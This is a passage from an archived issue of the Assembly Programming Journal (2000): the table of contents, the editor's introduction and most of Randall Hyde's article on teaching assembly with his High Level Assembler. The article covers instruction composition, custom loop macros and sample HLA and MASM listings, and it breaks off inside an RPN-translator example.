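        if (memcmp(buf + pos, pat, m) == 0)
            return buf + pos;
    }
    return NULL;
}
```

The table is rebuilt on every call here, which keeps the sketch short; a caller
searching for the same pattern many times would build it once and reuse it.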



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::.......................................................FIN

#17 From: "Michael Mondragon" <mammon_@...>
Date: Sat Aug 26, 2000 9:23 am
Subject: APJ Issue #8 Mar 00-Aug 00
 
::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.                                              Mar 00-Aug 00
:::\_____\::::::::::.                                             Issue 8
::::::::::::::::::::::.........................................................

             A S S E M B L Y   P R O G R A M M I N G   J O U R N A L
                       http://asmjournal.freeservers.com
                            asmjournal@...




T A B L E   O F   C O N T E N T S
----------------------------------------------------------------------
Introduction...................................................mammon_

"Teaching Assembly Language Using HLA"....................Randall.Hyde

"Processor Identification - Part II"..............Chris Dragan.&.Chili

"The LCC Intrinsics Utility"...............................Jacob.Navia

"Accessing COM Objects from Assembly"....................Ernest.Murphy

"64-bit Integer/ASCII Conversion"............................X-Calibre
Column: Win32 Assembly Programming
     "Win32 AppFatalExit Skeleton"................................Chili

Column: The Unix World
     "System Calls in FreeBSD".........................G.Adam.Stanislav
      "Loadable Kernel Modules"..................................mammon_

Column: Gaming Corner
     "Win32 ASM Game Programming"...........................Chris.Hobbs

Column: Assembly Language Snippets
     "SEH.INC"................................................X-Calibre
     "SEH.ASM"................................................X-Calibre


Column: Issue Solution
     "BCD_Conv"...........................................Angel.Tsankov

----------------------------------------------------------------------
        +++++++++++++++++++Issue Challenge++++++++++++++++++
               Convert a two-digit BCD to hexadecimal
----------------------------------------------------------------------


















::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::..............................................INTRODUCTION
                                                                      by mammon_


I cannot begin to count the number of subtle and overt hints I have received
that this issue is by far the most tardy APJ release to date. Quite a few
projects have conspired to steal my time away, from Linux essays to
disassembler coding to reverse engineering a hardware/software combo thrown
together by a madman bent on carrying the technology to his grave. Enough to
say, though, that the issue is finally ready for distribution. Not only that,
but I actually have about four articles left over --including Part II of the
ASM Gaming series-- to include in APJ 9.

The articles in this issue encompass a wide range of topics, from customizing
the LCC compiler to programming games in asm. Randall Hyde, who I'm sure needs
no introduction to assembly coders, has provided an excellent article
discussing the teaching of assembly language, and how he developed HLA to
assist. Chili has done a fair amount of work as well, working on everything
from CPU identification and exception handling to preparing an online gaming
article for ASCII publication.

X-Calibre has provided two complete programming packages, one for exception
handling and one for converting 64-bit integers; an introductory COM article
which further demystifies COM has been provided by Ernest Murphy. The Unix camp
is doubly represented this month, with an introduction to FreeBSD assembly
language [using NASM, of course] and my Linux article deferred from the
previous issue. Capping everything off is a quick challenge and solution
provided by Angel Tsankov.

It has been suggested to me many times during the Time Of No Issues that I
should acquire a staff for ensuring that the issues get out on time. I am open
to suggestions in this area; anyone willing to volunteer their time on a
regular basis is welcome to contact me. Ideally, the mag should have a staff
that solicits articles [hint IRC hint], tests the code in each article, and
edits the articles to enforce formatting [80 col, 3sp tab] and commenting
standards. To date I've been doing the last one only, and as is readily
apparent I put it off as long as possible.

Another note, regarding mirrors. Translation of the APJ issues is perfectly
acceptable and highly encouraged; all I request is an email giving the URL so
I can link to it from the main page. I should point out that the individual
articles, once removed from the context of the APJ issue, are the property of
their individual authors, so contact them before 'repackaging'. Regarding
formatting, I have also received a few requests to reformat APJ in HTML or
another markup language to make reading and browsing easier. This I will not
do, for it makes APJ less portable and causes problems copying code from the
magazine to a source file. I have been working on syntax highlighting/tag files
for vi and nedit; I will post these and any user-contributed translation files
[e.g. APJ_to_HTML] on the main APJ website.

All pleading and excuses aside, issue 8 is now put to bed, and issue 9 will be
out faster than you can recite GNU's license agreement. Enjoy the mag...

_m









::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                            Teaching Assembly Language Using HLA
                                            by Randall Hyde



I first began teaching assembly language programming at Cal Poly Pomona in the
Winter Quarter of 1987.  I quickly discovered that good pedagogical material
was difficult to come by;  even the textbooks available for the course left
something to be desired.  As a result, my students were learning very little
assembly language in the ten weeks available to the course.  After about two
quarters, I decided to do something about the textbook problem, so I began
writing a text I entitled "How to Program the IBM PC Using 8088 Assembly
Language" (obviously, this was back in the days when schools still used PCs
made by IBM and the main CPU you could always count on was the 8088).  "How to
Program..." became the epitome of a "work in progress."  Each quarter I would
get feedback from the students, update the text, and give it to Kinko's (and
the UCR Printing and Reprographics Department) to run off copies for my
students the very next quarter.

The original "How to Program..." text provided a basic set of library routines
to print strings, input characters and lines of text, and a few other basic
functions.  This allowed the students to quickly begin writing programs without
having to learn about the INT instruction, DOS, or BIOS.  However, I discovered
that students were spending a significant time each quarter writing their own
numeric conversion routines, string manipulation routines, etc.  One student
commented on "how much easier it was to program in 'C' than assembly language
since all those conversions and string operations were built into the
language."  I replied that the real savings were due more to the 'C' standard
library than the language itself and that a comparable library for assembly
language programmers would make assembly language programming almost as easy as
'C' programming.  At that moment a little light went on in my head and I sat
down and wrote the first few routines of what ultimately became the "UCR
Standard Library for 80x86 Assembly Language Programmers" (You can still get a
copy of the UCR stdlib from webster at the URL given above).  As I finished
each group of routines in the standard library, I incorporated them into my
courses.  This reaped immediate benefits as students spent less time writing
numeric conversion routines and spent more time learning assembly language.  My
students were getting into far more advanced topics than was possible before
the advent of the UCR Stdlib.

In the early 1990's, the 8088 CPU finally died off and IBM was no longer the
major supplier of PCs.  Not only was it time to change the title of my text,
but I needed to update references to the 8088 (that were specific to that chip)
and bring the text into the world of the 80386 and 80486 processors.  DOS was
still King and 16-bit code was still what everyone was writing, but issues of
optimization and the like were a little outdated in the text.  In addition to
the changes reflecting the new Intel CPUs, I also incorporated the UCR Standard
Library into the text since it dramatically improved the speed at which
students progressed beyond the basic assembly programming skills.  I entitled
the new version of the text "The Art of Assembly Language Programming," an
obvious knock-off of Knuth's series ("The Art of Computer Programming").

In early 1996 it became obvious to me that DOS was finally dying and I needed
to modify "The Art of Assembly Language Programming" (AoA) to use Windows as
the development platform.  I wasn't interested in having students write Windows
GUI applications in assembly language (the time spent teaching event-oriented
programming would interfere with the teaching of basic machine organization and
assembly language programming), but it was clear that the days of writing code
that arbitrarily pokes around in memory and accesses I/O addresses directly
(things that AoA taught) were nearly over.  So I decided to get started on a
new version of AoA that used Windows as the basic development environment with
the emphasis on writing console applications.  The UCR Standard Library was the
single most important pedagogical tool I'd discovered that dramatically
improved my students' progress.  As I began work on a new version of AoA for
Windows 3.1 my first task was to improve upon the UCR Standard Library to make
it even easier to use, more flexible, more efficient, and more "high level."

After six months of part time work I eventually gave up on the UCR Stdlib v2.0.
The idea was right; unfortunately, the tools at my disposal (specifically, MASM
6.11) weren't quite up to the task at hand.  I was writing some really tricky
macros, obviously exploiting code inside MASM that Microsoft's engineers had
never run (i.e., I discovered lots of bugs).  I would code in some workarounds
to the defects only to have the macro package break at the next minor patch of
MASM (e.g., from MASM 6.11a to MASM 6.11b).  There was also a robustness issue.
Although MASM's macro capabilities are quite powerful and it almost let me do
everything I wanted, it was very easy to confuse the macro package and then
MASM would generate some totally weird (but absolutely correct) diagnostic
messages that correctly described what was going wrong in the macro but made
absolutely no sense whatsoever at all to a beginning assembly language student
who was using the macro to print some data to the console device.  As it became
clear that the UCR Stdlib v2.0 would never be robust enough for student use, I
decided to take a different approach.

About this time, I was talking with my Department Chair about the assembly
language course.  We were identifying some of the problems that students had
learning assembly language.  One problem, of course, was the paradigm shift -
learning to solve problems using machine language rather than a high level
language.  The second problem we identified is that students get to apply very
little of what they've learned from other courses to the assembly language
class.  A third problem was the primitive tools available to assembly language
programmers.  Energized by this discussion, I decided to see how I could solve
these problems and improve the educational process.

Problem one, the paradigm shift, had to be handled carefully.  After all, the
whole purpose of having students take an assembly language programming course
in the first place is to acquaint them with the low-level operation of the
machine.  However, I felt it was certainly possible to redefine parts of
assembly language so that it would be more familiar to students.  For example,
one might test the carry flag after an addition to determine if an unsigned
overflow has occurred using code like the following:

     add eax, 5
     jnc  NoOverflow
       << code to execute if overflow occurs >>
NoOverflow:


Although this code is fairly straight-forward, you would be surprised how many
students cannot visualize this code on their own.  On the other hand, if you
feed them some pseudo code like:

     add eax, 5
     if( the carry flag is set ) then
         << code to execute if overflow occurs >>
     endif

those same students won't have any problems understanding this code.  To take
advantage of this difference in perspective, I decided to explore changing the
definition of assembly language to allow the use of the "if condition then do
something" paradigm rather than the "if a condition is false then skip over
something" paradigm.  Fundamentally, this does not change the material the
student has to learn;  it just presents it from a different point of view to
which they're already accustomed.  This certainly wasn't a gigantic leap away
from assembly language as it existed in 1996.  After all, MASM and other
assemblers were already allowing statements like ".if" and ".endif" in the
code.  So I tried these statements out on a few of my students.  What I
discovered is that the students picked up the basic "high level" syntax very
rapidly.  Once they mastered the high level syntax, they were able to learn the
low-level syntax (i.e., using conditional jumps) faster than ever before.  What
I discovered is something that Nicoderm CQ is pushing for their smoking
cessation program: "learning assembly language in graduated steps (from high
level to low level) is easier than going about it 'cold turkey.'"

The second problem, students not being able to leverage their programming
skills from other classes, is largely linked to the syntax of Intel x86
assembly language.  Many skills students pick up, such as programming style,
indentation, appropriate programming construct selection, etc., are useless in
a typical assembly language class.  Even skills like commenting and choosing
good variable names are slightly different in assembly language programs.  As a
result, students spend considerable (unproductive) time learning the new "rules
of the game" when writing assembly language programs.  This directly equates to
less progress over the ten week quarter.  Ideally, students should be able to
apply knowledge like program style, commenting style, algorithm
organization, and control construct selection they learned in a C/C++ or Pascal
course to their assembly language programs.  If they could, they'd be "up and
writing" in assembly language much faster than before.

The third problem with teaching assembly language is the primitive state of the
tools.  While MASM provides a wonderful set of high level language control
constructs, very little else about MASM supports this "brave new world" of
assembly language I want to teach.  For example, MASM's variable declarations
leave a lot to be desired (the syntax is straight out of the 1960's).  As I
noted earlier, as powerful as MASM's macro facilities are, they weren't
sufficient to develop a robust library package for my students.  I briefly
looked at TASM, but its "ideal" mode fared little better than MASM.  Likewise,
while development environments for high level languages have been improving by
leaps and bounds (e.g., Delphi and C++ Builder), assembly language programmers
are still using the same crude command line tools popularized in the early
1970's.  Codeview, which is practically useless under Windows, is the most
advanced tool Microsoft provides specifically for assembly language programmers.

Faced with these problems, I decided the first order of business was to create
a new x86 assembly language and write a compiler for it.  I decided to give
this language the somewhat-less-than-original name of "the High Level
Assembler," or HLA (IBM and Motorola both already have assemblers that use a
variant of this name).  It took three years, but the first version of HLA was
ready for public consumption in September of 1999.

I began using HLA in my CS 61 course (machine organization and assembly
language programming) at UCR in the Fall Quarter, 1999.  With no pedagogical
material other than a roughly written reference guide to the language, I was
expecting a complete disaster.  It turns out that I was pleasantly surprised.
Although the students did have major problems, the course went far more
smoothly than I anticipated and we managed to cover about the same material I
normally covered when using MASM.

Although things were going far better than I expected, this is not to say that
things were going great, or even as smoothly as I would have liked.  The major
problem, of course, was the lack of a textbook.  The only material the students
had to study from were their lecture notes.  Clearly something needed to be
done about this.  Of course, the whole reason for spending three years writing
HLA was to allow me to write a new version of AoA.  So in November, 1999, I
began work on the new edition of the text.  By the start of the Winter Quarter
in January, 2000, I had roughed together five chapters;  about 50% of the
material was brand new, the other 50% was cut, pasted, and updated from the
older version of the text.  During the quarter I rushed out two more chapters
bringing the total to seven.  The Winter Quarter went far more smoothly than
the Fall Quarter.  Student projects were much better and the progress of the
class outstripped any assembly language course I'd taught prior to that point.
Clearly the class was benefiting from the use of HLA.

By the start of the Spring Quarter in April, 2000, I'd managed to make one
proofreading pass over the first six chapters and I'd written the first draft
of the eighth chapter.  With a bit of luck, I will have the first draft of the
text ready by the end of Summer, 2000.  At that time I intend to "shop" the
text around to a set of publishers so other schools can benefit from the work.

Well, this has been a long-winded report of HLA's justification.  You're
probably wondering what HLA is and whether it is applicable to you (especially
if you're a programmer rather than an educator).  Fair enough; the rest of this
article will discuss the HLA system and how you would use it.

HLA is technically a compiler, not an assembler.  HLA v1.x converts an HLA
source file into a MASM-compatible assembly language source file.  This MASM
file is then assembled and linked to produce a Win32 executable file.  The HLA
compiler automatically runs the assembler and linker, so these steps are
transparent to the HLA user (other than the few extra seconds it takes to
assemble and link the output file).  This whole process takes only a few
seconds (for example, compiling, assembling, and linking the 750-line "x2p.hla"
program in the HLA examples directory only takes about two seconds on a 266 MHz
Pentium II system with UW SCSI drives).  I am planning to emit object code
directly in version 2.0 of HLA.  Until then, an HLA user will need Microsoft's
MASM and linker.  For those who would prefer to have HLA generate code for
TASM, NASM, or some other assembler, the HLA compiler source code is available;
have fun :-).

HLA is a Win32 console application and it generates Win32 applications.  By
default, it generates console applications although it does not restrict you to
writing console applications under Windows.  There is absolutely no support for
DOS applications.  While it is possible to write Linux applications with only
minor changes to HLA, the development process for Linux applications is
convoluted and hardly worthwhile.  HLA v2.0 will address portability across
32-bit x86 operating systems.  For now, using HLA is practical only under Win32
OSes (Win 95, 98, NT, and 2000).

When designing the HLA language, I chose a syntax that is very similar to
common imperative high level languages like Pascal/Delphi, Ada, Modula-2,
FORTRAN77, C/C++, and Java.  That is not to say that HLA compiles Pascal
programs, but rather, a Pascal programmer will note many similarities between
Pascal and HLA (and ditto for the other languages).  HLA stole many of the
ideas for data declarations from the Algol based languages (Pascal, Modula-2,
and Ada), it grabbed the ideas for many of its control structures from
FORTRAN77, Ada, and C/C++/Java, and the structure of the HLA Standard Library
is based on the C Standard Library.  So regardless of which high level language
you're most comfortable with in this set, you'll certainly recognize some
elements of your favorite HLL in HLA.

A carefully written HLA program will look almost exactly like a high level
language program.  Consider the following sample program:

program SampleHLApgm;
#include( "stdlib.hhf" )

const
     HelloWorld := "Hello World";

begin SampleHLApgm;

     stdout.put( "The classical 'Hello World' program: ", HelloWorld, nl );

end SampleHLApgm;


This program does the obvious thing.  Anyone with any high level language
background can probably figure out everything except the purpose of "nl" (which
is the newline string imported by the standard library).  This certainly
doesn't look like an assembly language program;  there isn't even a real
machine instruction in sight.  Of course, this is a trivial example;
nonetheless, I've managed to write reasonable HLA programs that were just over
1,000 lines of code that contained only one or two identifiable machine
language instructions.  If it's possible to do this, how can I get away with
calling HLA an assembly language?

The truth is, you can actually write a very similar looking program with MASM.
Here's an example I trot out for unbelievers.  This code is compilable with
MASM (assuming you include the UCR Standard Library v2.0 and some additional
code I've cut out for brevity):

var
         enum colors,<red,green,blue>

         colors c1, c2

endvar


Main            proc
                 mov     ax, dseg
                 mov     ds, ax
                 mov     es, ax

                 MemInit
                 InitExcept
                 EnableExcept

                 finit

                 try

                       cout    "Enter two colors:"
                       cin     c1, c2
                       cout    "You entered ",c1," and ",c2,nl
                       .if     c1 == red

                          cout    "c1 was red"

                       .endif

                    except  $Conversion
                       cout    "Conversion error occurred",nl

                    except  $Overflow
                       cout    "Overflow error occurred",nl

                 endtry
                 CleanUpEx
                 ExitPgm                 ;DOS macro to quit program.
Main            endp


As you can see, the only identifiable machine instructions here are the ones
that initialize the segment registers at the beginning of the program (which is
unnecessary in a Win32 environment).  So let me blunt criticism from "die-hard"
assembly fans right at the start:  HLA doesn't open up all kinds of new
programming paradigms that weren't possible before.  With some really clever
macros (e.g., enum, cout, and cin in the MASM code), it is quite possible to do
some really amazing things.  If you're wondering why you should bother with HLA
if MASM is so wonderful, don't forget my comments about the robustness of these
macros.  Both HLA and MASM (with the UCR Standard Library v2.0) work great as
long as you write perfect code and don't make any mistakes.  However, if you do
make mistakes, the MASM macro scheme gets ugly real quick.

The "die-hard" assembly fan will probably make the observation that they would
never write code like the MASM code I've presented above;  they would write
traditional assembly code.  They want to write traditional code.  They don't
want this high level syntax forced upon them.  Well, HLA doesn't force you to
use high level control structures rather than machine instructions.  You can
always write the low level code if you prefer it that way.  Here is the
original HLA program rewritten to use familiar machine instructions:

program SampleHLApgm2;
#include( "stdlib.hhf" )

data
               dword 37, 37;
     TcHWpStr: dword;
               byte  "The classical 'Hello World' program: ",0,0,0;

               dword 11, 11;
     HWstr:    dword;
               byte  "Hello World",0;

begin SampleHLApgm2;

     lea( eax, TcHWpStr );
     push( eax );
     call stdout.puts;

     lea( eax, HWstr );
     push( eax );
     call stdout.puts;

     call stdout.newln;

end SampleHLApgm2;

The stdout.puts and stdout.newln procedures come from the HLA Standard Library.
I will leave it up to the interested reader to translate these into Win API
Write calls if this code isn't sufficiently low level to satisfy.  Note that
HLA strings are not simple zero terminated strings like C/C++.  This explains
the extra zeros and dword values in the DATA section (the dword values hold the
string lengths).  I offer these without further explanation;  see the HLA
documentation for more details on HLA's string format.
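
For readers who think in C, the following sketch mimics the layout that the
DATA section above appears to use: two dword length fields placed immediately
before the characters, a zero terminator, and zero padding up to a dword
boundary.  Treat it as a guess at the shape, not as HLA's definition.  In
particular, which of the two dwords is the maximum length and which is the
current length is an assumption here, and the hstr_* names are invented.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Assumed layout: [max_len][len][chars...][0][zero padding to a dword].
   The returned pointer addresses the first character, so the result can
   still be handed to code that expects a zero terminated string. */
char *hstr_new(const char *text)
{
    uint32_t len;
    size_t body;
    unsigned char *block;

    assert(text != NULL);
    len = (uint32_t)strlen(text);
    /* characters plus at least one zero byte, rounded up to a dword */
    body = ((size_t)len + 4u) & ~(size_t)3u;
    block = calloc(1, 2 * sizeof(uint32_t) + body);
    if (block == NULL)
        return NULL;
    memcpy(block, &len, sizeof len);                /* assumed: maximum length */
    memcpy(block + sizeof len, &len, sizeof len);   /* assumed: current length */
    memcpy(block + 2 * sizeof len, text, len);
    return (char *)(block + 2 * sizeof len);
}

/* Reads the length from the dword just below the character data, so no
   scan for the terminator is needed. */
uint32_t hstr_len(const char *s)
{
    uint32_t len;

    assert(s != NULL);
    memcpy(&len, s - sizeof len, sizeof len);
    return len;
}

void hstr_free(char *s)
{
    if (s != NULL)
        free(s - 2 * sizeof(uint32_t));
}
```

With this rounding, an 11-character string gets one zero byte and a
37-character string gets three, which matches the byte counts in the listing.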

One thing you've probably noticed from this second example is that HLA uses a
functional notation for assembly language statements.  That is, the instruction
mnemonics look like function calls in a high level language and the operands
look like parameters to those functions.  The neat thing about this notation is
that it easily allows the use of "instruction composition."  Instruction
composition, like functional composition, means that you get to use one
instruction as the operand of another.  For example, an instruction like "mov(
mov( 0, eax ), ebx );" is perfectly legal in HLA.  The HLA compiler will
compile the innermost instruction first and then substitute the destination
operand of the innermost instruction for the operand position occupied by the
instruction.  HLA's MOV instruction takes the generic form "MOV( source,
destination );" so the former instruction translates to the following two
instruction sequence:

     mov( 0, eax );      // intel syntax:   mov eax, 0
     mov( eax, ebx );  // intel syntax:   mov ebx, eax
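
The substitution rule can be sketched in a few lines of Python.  This is only
a model of the idea, not how the HLA compiler is written: instructions are
nested tuples, the helper name compose is invented here, and it assumes that
the last operand is always the destination and that nested operands are
expanded left to right.

```python
def compose(instr, out):
    """Append the flattened instructions for `instr` to `out`.

    Returns the text that replaces `instr` when it is used as an operand:
    its destination, assumed here to be the last operand.
    """
    mnemonic, *operands = instr
    resolved = []
    for op in operands:
        if isinstance(op, tuple):
            # A nested instruction: emit it first, keep its destination.
            resolved.append(compose(op, out))
        else:
            resolved.append(str(op))
    out.append(f"{mnemonic}( {', '.join(resolved)} );")
    return resolved[-1]


lines = []
compose(("mov", ("mov", 0, "eax"), "ebx"), lines)
print("\n".join(lines))
```

Run on the nested MOV from the text, this prints the same two-instruction
sequence shown above.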

In and of itself, instruction composition is somewhat interesting, but
programmers striving to write readable code need to exercise caution when
using it.  It is real easy to write some really unreadable code if you abuse
instruction composition.  E.g., consider:

     mov( mov( add( mov( 0, eax ), sub( ebx, ecx )), edx ), mov( i, esi ));


Egads!  What does this mess do?  Some might consider the inclusion of
instruction composition in HLA to be a fault of the language if it allows
you
to write such unreadable code.  However, I've never felt it was the language
syntax's job to enforce good programming style.  If there's really a reason
for
writing such messy code, the compiler shouldn't prevent it.

Although you can produce some truly unreadable messes with instruction
composition, if you use it properly it can enhance the readability of your
programs.  For example, HLA lets you associate an arbitrary string with a
procedure that HLA will substitute for that procedure name when the procedure
call appears as an operand of another instruction.  Most functions that return
a value in a register specify that register name as their "returns" string
(the string HLA substitutes for the procedure call).  For example, the
"str.eq( str1, str2 )" function compares the two string operands and returns
true or false in AL depending on the result of the comparison.  This allows
you to write code like the following:

     if( str.eq( str1, "Hello" )) then

         stdout.put( "str1 = 'Hello'" nl );

     endif;

HLA directly translates the IF statement into the following sequence:

     str.eq( str1, "Hello" );
     if( al ) then

         stdout.put( "str1 = 'Hello'" nl );

     endif;

(If a register name appears where a boolean expression is expected, as AL
does
in the IF statement above, HLA emits a TEST instruction to see if the
register
contains a non-zero value.)

Arguably, the former version is a little more readable than the latter
version.
Instruction composition, when you use it in this fashion, lets you write
code
that "looks" a little more high level without the compiler having to
generate
lots of extra code (as it would if HLA supported a generalized arithmetic
expression parser).

Like MASM, HLA supports a wide variety of high level control structures.
HLA's
set is both higher level and lower level at the same time.  There are two
reasons HLA's control structures aren't always as powerful as MASM's.
First,
with the sole exception of object method invocations, I made a rule that
HLA's
high level control structures would not modify any general purpose registers
behind the programmer's back.  MASM, for example, may modify the value in
EAX
for certain boolean expressions it must compute.  Second, remember that the
primary goal of HLA is to teach assembly language; yes, it's supposed to
ease
the learning curve, but still the goal is to teach assembly language.  It is
possible to get carried away with the high level language features and then
wind up with an "assembler" that lets students write their assembly language
programs in a high level language.  In my opinion, MASM went too far with
what
it allows for boolean expressions.  HLA, for example, doesn't allow the use
of
the conjunctive and disjunctive operators ( "&&" and "||") in boolean
expressions.  I expect my students to generate the appropriate sequence of
low
level instructions themselves.  In general, most HLA boolean expressions
compile into two instructions: a CMP and a conditional jump.  I didn't want
to
go any farther than this because that would allow the students to avoid
learning how to write this code for themselves.

Although I designed HLA as a tool to teach assembly language programming,
this
is also a tool that I intend to use so I included lots of goodies for
advanced
assembly language programmers.  For example, HLA's macro facilities are more
powerful than I've seen in any programming language based macro processor.
One
unique feature of HLA's macro preprocessor is the ability to create "context
free" control structures using macros.  For example, suppose that you decide
that you need a new type of looping construct that HLA doesn't provide;
let's
say, a loop that will repeat once for each character in a string supplied as
a
parameter to the loop.  Let's call this loop "OnceForEachChar"  and decide
on
the following syntax:

     OnceForEachChar( SomeString )

         << Loop Body >>

     endOnceForEachChar;

On each iteration of this loop, the AL register will contain the
corresponding
character from the string specified as the OnceForEachChar operand.  You can
easily implement this loop using the following HLA macro:

macro OnceForEachChar( SomeString ): TopOfLoop, LoopExit;

     pushd( -1 );      // index into string.

     TopOfLoop:
         inc( (type dword [esp] ));   // Bump up index into string.
         #if( @IsConst( SomeString ))

             lea( eax, SomeString );  // Load address of string constant
                                      // into EAX.

         #else

             mov( SomeString, eax );  // Get ptr to string.

         #endif
         add( [esp], eax );           // Point at next available character.
         mov( [eax], al );            // Get the next available character.
         cmp( al, 0 );                // See if we're at the end of the string.
         je LoopExit;

terminator endOnceForEachChar;

         jmp TopOfLoop;      // Return to the top of the loop and repeat.
LoopExit:
         add( 4, esp );      // Remove index into string from stack.

endmacro;


Anyone familiar with MASM's macro processor should be able to figure out
most
of this code.  Note that the symbols "TopOfLoop" and "LoopExit" are local
symbols to this macro.  Hence, if you repeat this macro several times in the
code, HLA will emit different actual labels for these symbols to the MASM
output file.  The "@IsConst" is an HLA compile-time function that returns
true
if its operand is a constant.  Obtaining the address for a constant is
fundamentally different than obtaining the address of a string variable
(since
HLA string variables are actually pointers to the string data).  The most
interesting feature of this macro definition is the "terminator" line.  This
actually defines a second macro that is active only after HLA encounters the
"OnceForEachChar" macro and control returns to the first statement after the
OnceForEachChar invocation.  Invocations of "context free" macros always occur
in pairs;  that is, for every "OnceForEachChar" invocation there must be a
matching "endOnceForEachChar" invocation.  The following program demonstrates
this macro in use;  it also demonstrates that you can nest this newly created
control structure in your program:


program SampleHLApgm3;
#include( "stdlib.hhf" )

macro OnceForEachChar( SomeString ): TopOfLoop, LoopExit;

     pushd( -1 );      // index into string.

     TopOfLoop:
         inc( (type dword [esp] ));
        #if( @IsConst( SomeString ))

             lea( eax, SomeString );

         #else

             mov( SomeString, eax );

         #endif
         add( [esp], eax );
         mov( [eax], al );
         cmp( al, 0 );
         je LoopExit;

terminator endOnceForEachChar;

         jmp TopOfLoop;
LoopExit:
         add( 4, esp );

endmacro;


static
     strVar: string := ":" nl;

begin SampleHLApgm3;

     OnceForEachChar( "Hello" )

         stdout.putc( al );
         OnceForEachChar( strVar )

             stdout.putc( al );

         endOnceForEachChar;

     endOnceForEachChar;


end SampleHLApgm3;


This program produces the output:

H:
e:
l:
l:
o:



Here's the MASM code the compiler emits for the sequence above (the
"strings"
segment was moved for clarity):

strings         segment page public 'data'
                 align   4
?635_len        dword   5
         dword   5
?635_str        byte    "Hello",0,0,0
strings         ends



                 pushd   -1

?634__0278_:
                 inc     dword ptr [esp+0]       ;(type dword [esp])
                 lea     eax, ?635_str
                 add     eax, [esp+0] ;[esp]
                 mov     al, [eax+0] ;[eax]
                 cmp     al, 0
                 je      ?636__0279_
                 push    eax
                 call    stdio_putc      ;putc
                 pushd   -1

?639__027d_:
                 inc     dword ptr [esp+0]       ;(type dword [esp])
                 mov     eax, dword ptr ?630_strVar[0] ;strVar
                 add     eax, [esp+0] ;[esp]
                 mov     al, [eax+0] ;[eax]
                 cmp     al, 0
                 je      ?640__027e_
                 push    eax
                 call    stdio_putc      ;putc
                 jmp     ?639__027d_

?640__027e_:
                 add     esp, 4
                 jmp     ?634__0278_

?636__0279_:
                 add     esp, 4


In addition to the "terminator" clause, HLA macros also support a "keyword"
clause that lets you bury reserved words within a context-free language
construct.  For example, the HLA language does not provide a SWITCH/CASE
statement.  This omission was intentional.  Rather than build the SWITCH/CASE
statement into the HLA language, I implemented the SWITCH .. CASE .. DEFAULT
.. ENDSWITCH statement using HLA's macro facilities (as a demonstration of
HLA's power).  An HLA SWITCH statement takes the following form:

switch( reg32 )

   case( constantList1 )
       << statements >>

   case (constantList2 )
       << statements >>
           .
           .
           .
   default  // This is optional
       << statements >>

endswitch;

The switch macro implements the "switch" and "endswitch" reserved words using
the macro and terminator clauses in the macro declaration.  It implements the
"case" and "default" reserved words using the HLA "keyword" clause in a macro
definition.  The "keyword" clause is similar to the "terminator" clause except
it doesn't force the end of the macro expansion in the invoking code.  The
actual code for the HLA SWITCH statement is a little too complex to present
here, so I will extend the example of the OnceForEachChar macro to demonstrate
how you could use the "keyword" clause in a macro.

Let's suppose you wanted to add a "_break" clause to the "OnceForEachChar"
loop (I'm using "_break" with an underscore because "break" is an HLA reserved
word).  You could easily modify the "OnceForEachChar" macro to achieve this by
using the following code:

macro OnceForEachChar( SomeString ): TopOfLoop, LoopExit;

     pushd( -1 );      // index into string.

     TopOfLoop:
         inc( (type dword [esp] ));
        #if( @IsConst( SomeString ))

             lea( eax, SomeString );

         #else

             mov( SomeString, eax );

         #endif
         add( [esp], eax );
         mov( [eax], al );
         cmp( al, 0 );
         je LoopExit;

keyword _break;
         jmp LoopExit;

terminator endOnceForEachChar;

         jmp TopOfLoop;
LoopExit:
         add( 4, esp );

endmacro;


The "keyword" clause defines a macro ("_break") that is active between the
"OnceForEachChar" and "endOnceForEachChar" invocations.  This macro simply
expands to a jmp instruction that exits the loop.  Note that if you have
nested
"OnceForEachChar" loops and you "_break" out of the innermost loop, the code
only jumps out of the innermost loop, exactly as you would expect.

HLA's macro facilities are part of a larger feature I refer to as the "HLA
Compile-Time Language."  HLA actually contains a built-in interpreter that
executes while it is compiling your program.  The compile-time language
provides conditional compilation (the #IF..#ELSE..#ENDIF statements in the
previous example), interpreted procedure calls (macros), looping constructs
(#WHILE..#ENDWHILE), a very powerful constant expression evaluator,
compile-time I/O facilities (#PRINT, #ERROR, #INCLUDE, and #TEXT..#ENDTEXT),
and dozens of built-in compile time functions (like the @IsConst function
above).

The HLA built-in string functions (not to be confused with the HLA Standard
Library's string functions) are actually powerful enough to let you write a
compiler for a high level language completely within HLA.  I mentioned
earlier
that it is possible to write an expression compiler within HLA;  I was
serious.
The HLA compile-time language will let you write a sophisticated recursive
descent parser for arithmetic expressions (and other context-free language
constructs, for that matter).

HLA is a great tool for creating low-level Domain Specific Embedded Languages
(DSELs).  DSELs are mini-languages that you create on a project by project
basis to help reduce development time.  HLA's compile time language lets you
create some very high level constructs.  For example, HLA implements a very
powerful string pattern matching language in the "patterns" module found in
the HLA Standard Library.  This module lets you write pattern matching
programs that use techniques found in languages like SNOBOL4 and Icon.  As a
final example, consider the following HLA program that translates RPN (Reverse
Polish Notation) expressions into their equivalent assembly language (HLA)
statements and displays the results to the standard output:

// This program translates user RPN input into an
// equivalent sequence of assembly language instrs (HLA fmt).

program RPNtoASM;

#include( "stdlib.hhf" );

static

     s:              string;
     operand:        string;
     StartOperand:   dword;


macro mark;

     mov( esi, StartOperand );

endmacro;

macro delete;

     mov( StartOperand, eax );
     sub( eax, esi );
     inc( esi );
     sub( s, eax );
     str.delete( s, eax, esi );

endmacro;

procedure length( s:string ); returns( "eax" ); nodisplay;
begin length;

     push( ebx );
     mov( s, ebx );
     mov( (type str.strRec [ebx]).length, eax );
     pop( ebx );

end length;


begin RPNtoASM;

     stdout.put( "-- RPN to assembly --" nl );
     forever

         stdout.put( nl nl "Enter RPN sequence (empty line to quit): " );
         stdin.a_gets();
         mov( eax, s );
         breakif( length( s ) = 0 );
         while( length( s ) <> 0 ) do

             pat.match( s );

                 // Match identifiers and numeric constants

                 mark;
                 pat.zeroOrMoreWS();
                 pat.oneOrMoreCset( {'a'..'z', 'A'..'Z', '0'..'9', '_'} );
